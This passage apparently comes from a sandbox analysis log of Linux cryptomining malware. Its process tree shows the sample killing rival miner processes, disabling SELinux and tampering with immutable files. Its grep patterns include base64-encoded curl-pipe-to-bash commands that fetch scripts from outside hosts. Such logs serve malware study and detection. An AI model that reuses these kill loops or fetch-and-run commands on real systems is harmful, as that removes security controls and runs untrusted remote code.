    3⤵
    - Disables SELinux
    PID:1009
- - /usr/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1009
- - /usr/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1009
- - /sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1009
- - /bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1009
- /bin/grep
  grep -v grep
  2⤵
  PID:1005
- /bin/ps
  ps aux
  2⤵
  PID:1004
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1013
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1014
- /bin/grep
  grep voltuned
  2⤵
  PID:1012
- /bin/grep
  grep -v grep
  2⤵
  PID:1011
- /bin/ps
  ps aux
  2⤵
  PID:1010
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1018
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1019
- /bin/grep
  grep darwin
  2⤵
  PID:1017
- /bin/grep
  grep -v grep
  2⤵
  PID:1016
- /bin/ps
  ps aux
  2⤵
  PID:1015
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1023
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1022
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1024
- /bin/grep
  grep -v grep
  2⤵
  PID:1021
- /bin/ps
  ps aux
  2⤵
  PID:1020
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1028
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1029
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1027
- /bin/grep
  grep -v grep
  2⤵
  PID:1026
- /bin/ps
  ps aux
  2⤵
  PID:1025
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1033
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1034
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1032
- /bin/grep
  grep -v grep
  2⤵
  PID:1031
- /bin/ps
  ps aux
  2⤵
  PID:1030
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1038
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1039
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1037
- /bin/grep
  grep -v grep
  2⤵
  PID:1036
- /bin/ps
  ps aux
  2⤵
  PID:1035
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1044
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1043
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1042
- /bin/grep
  grep -v grep
  2⤵
  PID:1041
- /bin/ps
  ps aux
  2⤵
  PID:1040
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1048
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1047
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1049
- /bin/grep
  grep -v grep
  2⤵
  PID:1046
- /bin/ps
  ps aux
  2⤵
  PID:1045
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1053
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1054
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1052
- /bin/grep
  grep -v grep
  2⤵
  PID:1051
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1050
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1058
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1059
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1057
- /bin/grep
  grep -v grep
  2⤵
  PID:1056
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1055
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1063
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1062
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1064
- /bin/grep
  grep -v grep
  2⤵
  PID:1061
- /bin/ps
  ps aux
  2⤵
  PID:1060
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1068
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1069
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1067
- /bin/grep
  grep -v grep
  2⤵
  PID:1066
- /bin/ps
  ps aux
  2⤵
  PID:1065
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1073
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1072
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1074
- /bin/grep
  grep -v grep
  2⤵
  PID:1071
- /bin/ps
  ps aux
  2⤵
  PID:1070
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1078
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1079
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1077
- /bin/grep
  grep -v grep
  2⤵
  PID:1076
- /bin/ps
  ps aux
  2⤵
  PID:1075
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1083
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1084
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1082
- /bin/grep
  grep -v grep
  2⤵
  PID:1081
- /bin/ps
  ps aux
  2⤵
  PID:1080
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1088
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1087
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1089
- /bin/grep
  grep -v grep
  2⤵
  PID:1086
- /bin/ps
  ps aux
  2⤵
  PID:1085
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1092
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1093
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1094
- /bin/grep
  grep -v grep
  2⤵
  PID:1091
- /bin/ps
  ps aux
  2⤵
  PID:1090
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1101
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1102
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1100
- /bin/grep
  grep -v grep
  2⤵
  PID:1099
- /bin/ps
  ps aux
  2⤵
  PID:1098
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1106
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1107
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1105
- /bin/grep
  grep -v grep
  2⤵
  PID:1104
- /bin/ps
  ps aux
  2⤵
  PID:1103
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1111
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1110
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1112
- /bin/grep
  grep -v grep
  2⤵
  PID:1109
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1108
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1117
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1116
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1115
- /bin/grep
  grep -v grep
  2⤵
  PID:1114
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1113
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1121
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1122
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1120
- /bin/grep
  grep -v grep
  2⤵
  PID:1119
- /bin/ps
  ps aux
  2⤵
  PID:1118
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1127
- /bin/grep
  grep svc
  2⤵
  PID:1125
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1126
- /bin/grep
  grep -v grep
  2⤵
  PID:1124
- /bin/ps
  ps aux
  2⤵
  PID:1123
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1132
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1131
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1130
- /bin/grep
  grep -v grep
  2⤵
  PID:1129
- /bin/ps
  ps aux
  2⤵
  PID:1128
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1136
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1137
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1135
- /bin/grep
  grep -v grep
  2⤵
  PID:1134
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1133
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1142
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1141
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1140
- /bin/grep
  grep -v grep
  2⤵
  PID:1139
- /bin/ps
  ps aux
  2⤵
  PID:1138
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1146
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1147
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1145
- /bin/grep
  grep -v grep
  2⤵
  PID:1144
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1143
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1151
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1152
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1150
- /bin/grep
  grep -v grep
  2⤵
  PID:1149
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1148
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1156
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1157
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:1155
- /bin/grep
  grep -v grep
  2⤵
  PID:1154
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1153
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1161
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1162
- /bin/grep
  grep http_0xCC030
  2⤵
  - Disables SELinux
  PID:1160
- /bin/grep
  grep -v grep
  2⤵
  PID:1159
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1158
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1167
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1166
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1165
- /bin/grep
  grep -v grep
  2⤵
  PID:1164
- /bin/ps
  ps aux
  2⤵
  PID:1163
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1171
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1172
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1170
- /bin/grep
  grep -v grep
  2⤵
  PID:1169
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1168
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1177
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1176
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1175
- /bin/grep
  grep -v grep
  2⤵
  PID:1174
- /bin/ps
  ps aux
  2⤵
  PID:1173
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1182
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1181
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1180
- /bin/grep
  grep -v grep
  2⤵
  PID:1179
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1178
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1186
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1187
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1185
- /bin/grep
  grep -v grep
  2⤵
  PID:1184
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1183
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1191
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1190
- /bin/grep
  grep -v grep
  2⤵
  PID:1189
- /bin/ps
  ps aux
  2⤵
  PID:1188
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1195
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1194
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1196
- /bin/grep
  grep -v grep
  2⤵
  PID:1193
- /bin/ps
  ps aux
  2⤵
  PID:1192
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1200
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1201
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1199
- /bin/grep
  grep -v grep
  2⤵
  PID:1198
- /bin/ps
  ps aux
  2⤵
  PID:1197
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1205
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1206
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1204
- /bin/grep
  grep -v grep
  2⤵
  PID:1203
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1202
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1211
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1210
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1209
- /bin/grep
  grep -v grep
  2⤵
  PID:1208
- /bin/ps
  ps aux
  2⤵
  PID:1207
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1216
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1215
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1214
- /bin/grep
  grep -v grep
  2⤵
  PID:1213
- /bin/ps
  ps aux
  2⤵
  PID:1212
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1220
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1221
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1219
- /bin/grep
  grep -v grep
  2⤵
  PID:1218
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1217
- /bin/grep
  grep "]"
  2⤵
  PID:1225
- /bin/grep
  grep -v aux
  2⤵
  PID:1224
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1226
- /bin/grep
  grep -v grep
  2⤵
  PID:1223
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1227
- /bin/ps
  ps aux
  2⤵
  PID:1222
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1231
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1232
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1230
- /bin/grep
  grep -v grep
  2⤵
  PID:1229
- /bin/ps
  ps aux
  2⤵
  PID:1228
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1236
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1237
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1235
- /bin/grep
  grep -v grep
  2⤵
  PID:1234
- /bin/ps
  ps aux
  2⤵
  PID:1233
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1241
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1242
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1240
- /bin/grep
  grep -v grep
  2⤵
  PID:1239
- /bin/ps
  ps aux
  2⤵
  PID:1238
- /bin/grep
  grep -v -
  2⤵
  PID:1246
- /bin/grep
  grep -v /
  2⤵
  PID:1245
- /bin/grep
  grep -v _
  2⤵
  PID:1247
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1248
- /bin/grep
  grep -v grep
  2⤵
  PID:1244
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1249
- /bin/ps
  ps aux
  2⤵
  PID:1243
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1253
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1254
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1252
- /bin/grep
  grep -v grep
  2⤵
  PID:1251
- /bin/ps
  ps aux
  2⤵
  PID:1250
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1259
- /bin/grep
  grep rsync
  2⤵
  PID:1257
- /bin/grep
  grep -v grep
  2⤵
  PID:1256
- /bin/ps
  ps aux
  2⤵
  PID:1255
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1263
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1264
- /bin/grep
  grep watchd0g
  2⤵
  PID:1262
- /bin/grep
  grep -v grep
  2⤵
  PID:1261
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1260
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1268
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1269
- /bin/grep
  grep -v grep
  2⤵
  PID:1266
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1267
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1265
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1267
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1267
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1267
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1267
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1267
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1267
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1273
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1274
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  - Disables SELinux
  PID:1272
- /bin/grep
  grep -v grep
  2⤵
  PID:1271
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1270
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1278
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1279
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1277
- /bin/grep
  grep -v grep
  2⤵
  PID:1276
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1275
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1283
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1284
- /bin/grep
  grep gitee.com
  2⤵
  PID:1282
- /bin/grep
  grep -v grep
  2⤵
  PID:1281
- /bin/ps
  ps aux
  2⤵
  PID:1280
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1288
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1289
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1287
- /bin/grep
  grep -v grep
  2⤵
  PID:1286
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1285
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1294
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1293
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1292
- /bin/grep
  grep -v grep
  2⤵
  PID:1291
- /bin/ps
  ps aux
  2⤵
  PID:1290
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1298
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1299
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1297
- /bin/grep
  grep -v grep
  2⤵
  PID:1296
- /bin/ps
  ps aux
  2⤵
  PID:1295
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1304
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1303
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1302
- /bin/grep
  grep -v grep
  2⤵
  PID:1301
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1300
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1308
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1309
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1307
- /bin/grep
  grep -v grep
  2⤵
  PID:1306
- /bin/ps
  ps aux
  2⤵
  PID:1305
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1313
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1314
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1312
- /bin/grep
  grep -v grep
  2⤵
  PID:1311
- /bin/ps
  ps aux
  2⤵
  PID:1310
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1318
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1319
- /bin/grep
  grep netdns
  2⤵
  PID:1317
- /bin/grep
  grep -v grep
  2⤵
  PID:1316
- /bin/ps
  ps aux
  2⤵
  PID:1315
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1323
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1324
- /bin/grep
  grep watchdogs
  2⤵
  PID:1322
- /bin/grep
  grep -v grep
  2⤵
  PID:1321
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1320
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1328
- /bin/grep
  grep -v grep
  2⤵
  PID:1326
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1329
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:1327
- /bin/ps
  ps aux
  2⤵
  PID:1325
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1334
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1333
- /bin/grep
  grep kinsing
  2⤵
  PID:1332
- /bin/grep
  grep -v grep
  2⤵
  PID:1331
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1330
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1339
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1338
- /bin/grep
  grep redis2
  2⤵
  PID:1337
- /bin/grep
  grep -v grep
  2⤵
  PID:1336
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1335
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1344
- /bin/grep
  grep -v aux
  2⤵
  PID:1342
- /bin/grep
  grep " ps"
  2⤵
  PID:1343
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1345
- /bin/grep
  grep -v grep
  2⤵
  PID:1341
- /bin/ps
  ps aux
  2⤵
  PID:1340
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1350
- /bin/grep
  grep sync_supers
  2⤵
  PID:1348
- /bin/grep
  grep -v grep
  2⤵
  PID:1347
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1346
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1349
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1354
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1355
- /bin/grep
  grep cpuset
  2⤵
  PID:1353
- /bin/grep
  grep -v grep
  2⤵
  PID:1352
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1351
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1360
- /bin/grep
  grep "x]"
  2⤵
  PID:1359
- /bin/grep
  grep -v aux
  2⤵
  PID:1358
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1361
- /bin/grep
  grep -v grep
  2⤵
  PID:1357
- /bin/ps
  ps aux
  2⤵
  PID:1356
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1365
- /bin/grep
  grep -v aux
  2⤵
  PID:1364
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1366
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1367
- /bin/grep
  grep -v grep
  2⤵
  PID:1363
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1362
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1371
- /bin/grep
  grep -v aux
  2⤵
  PID:1370
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1372
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1373
- /bin/grep
  grep -v grep
  2⤵
  PID:1369
- /bin/ps
  ps aux
  2⤵
  PID:1368
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1377
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1376
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1378
- /bin/grep
  grep -v grep
  2⤵
  PID:1375
- /bin/ps
  ps aux
  2⤵
  PID:1374
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1382
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1383
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1381
- /bin/grep
  grep -v grep
  2⤵
  PID:1380
- /bin/ps
  ps aux
  2⤵
  PID:1379
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1387
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1388
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1386
- /bin/grep
  grep -v grep
  2⤵
  PID:1385
- /bin/ps
  ps aux
  2⤵
  PID:1384
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1392
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1393
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1391
- /bin/grep
  grep -v grep
  2⤵
  PID:1390
- /bin/ps
  ps aux
  2⤵
  PID:1389
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1397
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1398
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1396
- /bin/grep
  grep -v grep
  2⤵
  PID:1395
- /bin/ps
  ps aux
  2⤵
  PID:1394
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1402
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1401
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1403
- /bin/grep
  grep -v grep
  2⤵
  PID:1400
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1399
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1408
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1407
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1406
- /bin/grep
  grep -v grep
  2⤵
  PID:1405
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1404
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1412
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1413
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1411
- /bin/grep
  grep -v grep
  2⤵
  PID:1410
- /bin/ps
  ps aux
  2⤵
  PID:1409
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1417
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1418
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1416
- /bin/grep
  grep -v grep
  2⤵
  PID:1415
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1414
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1422
- /usr/bin/xargs
